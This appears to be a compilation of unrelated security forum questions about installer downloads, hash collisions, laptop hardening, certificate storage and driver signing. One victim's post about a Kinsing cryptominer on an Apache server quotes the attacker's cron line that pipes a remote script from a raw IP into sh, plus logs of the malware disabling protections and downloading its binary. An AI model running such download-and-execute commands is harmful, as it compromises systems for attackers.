How detectable is malicious code run by programs that download and then install the main file?

There are many programs (free or otherwise) where the user is asked to download a small installer file, which may display the EULA to the user or do some other user registration, which then downloads the latest version of the main program (much larger, and often consists of many files) to install the software.

There are many instances where this is legitimate, and it seems to be popular with mainstream software packages like ADOBE or Microsoft products, and it makes sense to use this approach to handle the installation of software, but if I download a 15MB installer program for some audio processing program and scan it on VirusTotal and it says nothing is detected, but then when I run it the program says it needs to download 150MB, it completely avoids the detection, doesn’t it?

The downloaded software may even be different each time, and likely will be because of version changes and updates.

So I should then scan the newly downloaded files before running them, shouldn’t I?

Is it common for programs to be set up so that they download a malicious file from a server and then run it within its own program? And does that get detected as malicious?

Theoretically, If you know the hash of a program one intends to install and you generate another file that hashes to that value what could you do?


If I know the hash of a program you intend to install is d306c9f6c5…, if I generate some other file that hashes to that value, I could wreak all sorts of havoc. – from https://nakamoto.com/hash-functions/

Theoretically, If you know the hash of a program one intends to install and you generate another file that hashes to that value what could you do?

A bitcoin miner is getting install on my web server with the apache2 process

For a few weeks, someone, probably a bot keep installing a bitcoin miner on my server, I find it because it is taking all the CPU. The process name is kdevtmpfsi located at /tmp/kdevtmpfsi, there’s watch dog process kinsing located at /var/tmp/kinsing and a cronjob:

* * * * * wget -q -O - http://195.3.146.118/ex.sh | sh > /dev/null 2>&1 

I keep removing the trace above, but the attacking keep re-injecting, using the same exploit which must be tie to the apache2 process because here’s what I find in my apache2 error log:

  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current                                  Dload  Upload   Total   Spent    Left  Speed    0     0    0     0    0     0      0      0 --:--:-- --:--:-- --:--:--     0sh: 2: ulimit: error setting limit (Operation not permitted) rm: cannot remove '/var/log/syslog': Permission denied  100 27434  100 27434    0     0  4465k      0 --:--:-- --:--:-- --:--:-- 4465k chattr: Permission denied while setting flags on /tmp/ chattr: Permission denied while setting flags on /var/tmp/ ERROR: You need to be root to run this script iptables v1.6.1: can't initialize iptables table `filter': Permission denied (you must be root) Perhaps iptables or your kernel needs to be upgraded. sudo: no tty present and no askpass program specified sh: 10: cannot create /proc/sys/kernel/nmi_watchdog: Permission denied sh: 11: cannot create /etc/sysctl.conf: Permission denied userdel: user 'akay' does not exist userdel: user 'vfinder' does not exist chattr: Permission denied while trying to stat /root/.ssh/ chattr: Permission denied while trying to stat /root/.ssh/authorized_keys (Not all processes could be identified, non-owned process info  will not be shown, you would have to be root to see it all.) (Not all processes could be identified, non-owned process info  will not be shown, you would have to be root to see it all.) (Not all processes could be identified, non-owned process info  will not be shown, you would have to be root to see it all.) (Not all processes could be identified, non-owned process info  will not be shown, you would have to be root to see it all.) (Not all processes could be identified, non-owned process info  will not be shown, you would have to be root to see it all.) (Not all processes could be identified, non-owned process info  will not be shown, you would have to be root to see it all.) (Not all processes could be identified, non-owned process info  will not be shown, you would have to be root to see it all.) (Not all processes could be identified, non-owned process info  will not be shown, you would have to be root to see it all.) (Not all processes could be identified, non-owned process info  will not be shown, you would have to be root to see it all.) (Not all processes could be identified, non-owned process info  will not be shown, you would have to be root to see it all.) (Not all processes could be identified, non-owned process info  will not be shown, you would have to be root to see it all.) (Not all processes could be identified, non-owned process info  will not be shown, you would have to be root to see it all.) (Not all processes could be identified, non-owned process info  will not be shown, you would have to be root to see it all.) (Not all processes could be identified, non-owned process info  will not be shown, you would have to be root to see it all.) (Not all processes could be identified, non-owned process info  will not be shown, you would have to be root to see it all.) (Not all processes could be identified, non-owned process info  will not be shown, you would have to be root to see it all.) (Not all processes could be identified, non-owned process info  will not be shown, you would have to be root to see it all.) (Not all processes could be identified, non-owned process info  will not be shown, you would have to be root to see it all.) (Not all processes could be identified, non-owned process info  will not be shown, you would have to be root to see it all.) (Not all processes could be identified, non-owned process info  will not be shown, you would have to be root to see it all.) grep: Trailing backslash grep: write error: Broken pipe kill: (56): Operation not permitted kill: (25879): No such process kill: (25886): No such process (Not all processes could be identified, non-owned process info  will not be shown, you would have to be root to see it all.) (Not all processes could be identified, non-owned process info  will not be shown, you would have to be root to see it all.) pkill: killing pid 807 failed: Operation not permitted pkill: killing pid 836 failed: Operation not permitted pkill: killing pid 836 failed: Operation not permitted log_rot: no process found chattr: No such file or directory while trying to stat /etc/ld.so.preload rm: cannot remove '/opt/atlassian/confluence/bin/1.sh': No such file or directory rm: cannot remove '/opt/atlassian/confluence/bin/1.sh.1': No such file or directory rm: cannot remove '/opt/atlassian/confluence/bin/1.sh.2': No such file or directory rm: cannot remove '/opt/atlassian/confluence/bin/1.sh.3': No such file or directory rm: cannot remove '/opt/atlassian/confluence/bin/3.sh': No such file or directory rm: cannot remove '/opt/atlassian/confluence/bin/3.sh.1': No such file or directory rm: cannot remove '/opt/atlassian/confluence/bin/3.sh.2': No such file or directory rm: cannot remove '/opt/atlassian/confluence/bin/3.sh.3': No such file or directory rm: cannot remove '/var/tmp/lib': No such file or directory rm: cannot remove '/var/tmp/.lib': No such file or directory chattr: No such file or directory while trying to stat /tmp/lok chmod: cannot access '/tmp/lok': No such file or directory sh: 477: docker: not found sh: 478: docker: not found sh: 479: docker: not found sh: 480: docker: not found sh: 481: docker: not found sh: 482: docker: not found sh: 483: docker: not found sh: 484: docker: not found sh: 485: docker: not found sh: 486: docker: not found sh: 487: docker: not found sh: 488: docker: not found sh: 489: docker: not found sh: 490: docker: not found sh: 491: docker: not found sh: 492: docker: not found sh: 493: docker: not found sh: 494: docker: not found sh: 495: docker: not found sh: 496: docker: not found sh: 497: docker: not found sh: 498: docker: not found sh: 499: setenforce: not found sh: 500: cannot create /etc/selinux/config: Permission denied Failed to stop apparmor.service: Interactive authentication required. See system logs and 'systemctl status apparmor.service' for details. Synchronizing state of apparmor.service with SysV service script with /lib/systemd/systemd-sysv-install. Executing: /lib/systemd/systemd-sysv-install disable apparmor Failed to reload daemon: Interactive authentication required. update-rc.d: error: Permission denied Failed to stop aliyun.service.service: Interactive authentication required. See system logs and 'systemctl status aliyun.service.service' for details. Failed to disable unit: Interactive authentication required. sh: echo: I/O error md5sum: /var/tmp/kinsing: No such file or directory sh: echo: I/O error sh: echo: I/O error --2020-01-10 19:03:30--  https://bitbucket.org/kondrongo12/git/raw/master/kinsing Resolving bitbucket.org (bitbucket.org)... 18.205.93.2, 18.205.93.1, 18.205.93.0, ... Connecting to bitbucket.org (bitbucket.org)|18.205.93.2|:443... connected. HTTP request sent, awaiting response... 200 OK Length: 17072128 (16M) [application/octet-stream] Saving to: '/var/tmp/kinsing'       0K .......... .......... .......... .......... ..........  0% 1.54M 11s     50K .......... .......... .......... .......... ..........  0% 3.62M 7s    100K .......... .......... .......... .......... ..........  0% 5.97M 6s    150K .......... .......... .......... .......... ..........  1% 7.92M 5s  16500K .......... .......... .......... .......... .......... 99% 11.5M 0s  16550K .......... .......... .......... .......... .......... 99% 9.01M 0s  16600K .......... .......... .......... .......... .......... 99% 11.3M 0s  16650K .......... .......... ..                              100% 28.2M=1.5s  2020-01-10 19:03:31 (10.8 MB/s) - '/var/tmp/kinsing' saved [17072128/17072128]  sh: echo: I/O error sh: echo: I/O error

This is in apache2 main error log file (/var/log/apache2/error.log) and no in my website error log so I am thinking that it is not related to my php code, what should I do/check next?

Secure way to install windows 10 and winscp,notepad++,wamp on new laptop

I have a project with very critical information from business clients. I will buy a new laptop for this to manage/handle/analyze that information.

All I need is:

  • WAMP to run php script only on localhost

  • Notepad++ or other IDE

  • Chrome browser to access gmail, google drive, amazon aws etc.

  • Winscp to connect with external server

Windows

So first about Windows 10. I can buy laptop with Windows 10 Home preinstalled. Or I can buy freedos version and install Windows 10 Pro. In later case I will need to download it from Windows website and create bootable usb in other laptop where Windows is already installed. I am not sure if there are any potential security risk that in case if the second computer is infected it will infect also usb?

Apps

I am not sure how I could omit any risk about Wamp, Notepad++, Winscp. Yes all of them are trusted apps, but you never know right? So my question is, are the these apps secure enough to be used on environments where security is extremely important? Are there any step I should do once installed? Maybe once installed I should set proper firewall and disable any updates for it and then just keep eye if there are any security updates on their website?

I may sound paranoid, but again the client information is very critical and the leak could result in big losses.

Install a PFX/SSL certificate downloaded from the server on Android/iOS device in a React Native app?

I am building a React Native application that downloads an SSL certificate file or a PFX from the server or a remote file storage. After getting this file, I want to install this certificate onto the device so that only my app can access it. I want to use this certificate to facilitate secure API calls to another server that talks HTTPS. I am assuming that I should use the Keychain on iOS and Keystore on Android for storing the certificate but I am not sure if it enables me to store a PFX. And after storing it, how do I use it for the API calls that I make subsequently?

Too many pop ups on driver install [on hold]

I am setting up a new build machine for my company’s software. We have 7 drivers and previously on Windows 7 it would pop up once with do you trust the company and if you clicked “always trust” and clicked yes it would install all 7 without any more pop ups. The new build from the new build machine it pops up and asks you separately for all 7 drivers even if you click “always trust.” These pop ups are very annoying and we would really like to get it back down to a single pop up as to not annoy our customers. The old build machine has a Symantec code signing certificate that is due to expire. I bought a new Sectigo code signing certificate for the build machine that is being used to sign the 7 drivers that are causing the pop ups. Any idea what might have changed or what I could do to get it back down to a single pop up? Thanks.